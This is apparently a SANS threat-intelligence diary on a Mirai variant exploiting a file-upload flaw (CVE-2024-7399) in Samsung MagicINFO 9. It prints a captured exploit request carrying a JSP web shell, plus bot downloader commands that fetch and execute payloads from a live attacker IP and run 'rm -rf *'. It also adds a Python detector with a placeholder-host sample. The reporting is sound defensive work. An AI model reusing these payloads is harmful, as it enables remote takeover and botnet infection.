"Mirai" Now Exploits Samsung MaginINFO CMS (CVE-2024-7399)
Last August, Samsung patched an arbitrary file upload vulnerability that could lead to remote code execution [1]. The announcement was very sparse and did not even list the affected systems:
SVP-AUG-2024
SVE-2024-50018(CVE-2024-7399)
Weakness : Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server allows attackers to write arbitrary file as system authority.
Patch information : The patch modifies verification logic of the input.
At around the same time, a CVE was assigned to the vulnerability: CVE-2024-7399. The NVD entry has a few more details [2]. In particular, it identifies a legacy CMS distributed by Samsung, MagicINFO 9, as the vulnerable software:
Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server version before 21.1050 allows attackers to write arbitrary file as system authority.
For some reason, this vulnerability was covered in a recent article on Cybersecuritynews, providing additional details [3]:
According to the technical analysis, the /MagicInfo/servlet/SWUpdateFileUploader endpoint implemented by the SWUpdateFileUploadServlet class contains multiple security issues.
Sadly, I cannot find a reference to the original technical analysis, or who performed it, in the Cybersecuritynews article. But we are now seeing some exploit attempts for the issue.
The POST request we are seeing is a typical "IoT Botnet" style request, like many we have seen before. It first uses the MagicINFO 9 vulnerability to download a script:
POST /MagicInfo/servlet/SWUpdateFileUploader HTTP/1.1
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 1151
Content-Type: multipart/form-data; boundary=4f3a72624fa5c399c5d203d3617891cb
--4f3a72624fa5c399c5d203d3617891cb
Content-Disposition: form-data; name="file"; filename="1746466018shell.jsp"
Content-Type: application/octet-stream
<%@ page import="java.io.*" %>
<%
try {
String[] cmd = {
"/bin/sh", "-c",
"cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; "
+ "wget http://176.65.142.122/ohshit.sh; "
+ "curl -O http://176.65.142.122/ohshit.sh; "
+ "chmod 777 ohshit.sh; sh ohshit.sh; "
+ "tftp 176.65.142.122 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; "
+ "tftp -r ohshit2.sh -g 176.65.142.122; chmod 777 ohshit2.sh; sh ohshit2.sh; "
+ "ftpget -v -u anonymous -p anonymous -P 21 176.65.142.122 ohshit1.sh ohshit1.sh; sh ohshit1.sh; "
+ "rm -rf ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *"
};
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
} catch (Exception e) {
out.println("Error: " + e.toString());
}
%>
--4f3a72624fa5c399c5d203d3617891cb--
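For defenders looking at proxy or IDS captures, here is an added Python example (not part of the original diary or of any Samsung code) that inspects a raw HTTP request for the three things that stand out above: the vulnerable endpoint, a server-side script as the uploaded filename, and command-execution strings in the body. The two request bodies are constructed to mirror the capture, with the download host replaced by a placeholder.

```python
import re

# Endpoint named in the write-up; compared lower-cased since the server may run on Windows.
VULN_PATH = "/magicinfo/servlet/swupdatefileuploader"
# File types a software-update uploader has no reason to accept.
EXEC_EXTENSIONS = (".jsp", ".jspx", ".war", ".sh")
# Content that marks the upload as a command-executing web shell, not an update package.
SHELL_MARKERS = (b"Runtime.getRuntime().exec", b"<%@ page", b"/bin/sh")
FILENAME_RE = re.compile(rb'Content-Disposition:[^\r\n]*filename="([^"]*)"', re.I)


def inspect_request(raw: bytes) -> dict:
    """Flag a captured HTTP request that looks like a CVE-2024-7399 upload attempt."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, path = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")[:2]
    filenames = [m.decode("latin-1") for m in FILENAME_RE.findall(body)]
    reasons = []
    for name in filenames:
        # A bare filename field should never carry path separators or parent references.
        if ".." in name or "/" in name or "\\" in name:
            reasons.append(f"path traversal in filename {name!r}")
        if name.lower().endswith(EXEC_EXTENSIONS):
            reasons.append(f"executable extension in filename {name!r}")
    for marker in SHELL_MARKERS:
        if marker in body:
            reasons.append(f"web shell marker {marker.decode()!r} in body")
    hits_endpoint = method == "POST" and path.lower() == VULN_PATH
    return {"path": path, "filenames": filenames, "reasons": reasons,
            "alert": hits_endpoint and bool(reasons)}


BOUNDARY = b"--4f3a72624fa5c399c5d203d3617891cb"
# Constructed sample modelled on the captured request; ATTACKER_HOST is a placeholder.
SHELL_UPLOAD = (
    b"POST /MagicInfo/servlet/SWUpdateFileUploader HTTP/1.1\r\n"
    b"User-Agent: python-requests/2.27.1\r\n"
    b"Content-Type: multipart/form-data; boundary=4f3a72624fa5c399c5d203d3617891cb\r\n\r\n"
    + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="1746466018shell.jsp"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b'<%@ page import="java.io.*" %>\r\n'
    b'<% Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", '
    b'"wget http://ATTACKER_HOST/ohshit.sh; sh ohshit.sh"}); %>\r\n'
    + BOUNDARY + b"--\r\n"
)
# Constructed benign upload to the same endpoint: the endpoint alone is not the signal.
UPDATE_UPLOAD = (
    b"POST /MagicInfo/servlet/SWUpdateFileUploader HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=4f3a72624fa5c399c5d203d3617891cb\r\n\r\n"
    + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="MagicInfo_update.zip"\r\n'
    b"Content-Type: application/zip\r\n\r\nPK\x03\x04...\r\n"
    + BOUNDARY + b"--\r\n"
)
```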
The bash script contains the usual "multi-architecture" downloader for the actual bot. I am only including the first couple of lines here, as they repeat for different architectures:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.122/hiddenbin/boatnet.x86; curl -O http://176.65.142.122/hiddenbin/boatnet.x86;cat boatnet.x86 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.122/hiddenbin/boatnet.mips; curl -O http://176.65.142.122/hiddenbin/boatnet.mips;cat boatnet.mips >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.122/hiddenbin/boatnet.arc; curl -O http://176.65.142.122/hiddenbin/boatnet.arc;cat boatnet.arc >WTF;chmod +x *;./WTF
The "botnet" bot is well recognized by Virustotal and appears to be yet another version of Mirai, which matches the download behavior [4].
[1] https://security.samsungtv.com/securityUpdates
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-7399
[3] https://cybersecuritynews.com/samsung-magicinfo-vulnerability/
[4] https://www.virustotal.com/gui/file/3f26e58cd09804d9c38c6613fb976d8a680555f3eac38a46ef7f3927beaadd26
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu